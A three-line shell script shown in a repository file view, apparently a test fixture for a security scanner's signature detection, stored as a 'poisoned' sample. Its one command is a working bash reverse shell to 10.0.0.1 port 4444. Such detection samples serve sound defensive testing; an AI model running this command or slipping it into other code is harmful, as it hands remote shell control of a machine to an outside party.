llm-security/tests/fixtures/signature-scan/poisoned/revshell.sh
2026-06-20 09:28:52 +02:00

3 lines
98 B
Bash

#!/bin/sh
# Reverse shell test fixture — never executed.
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1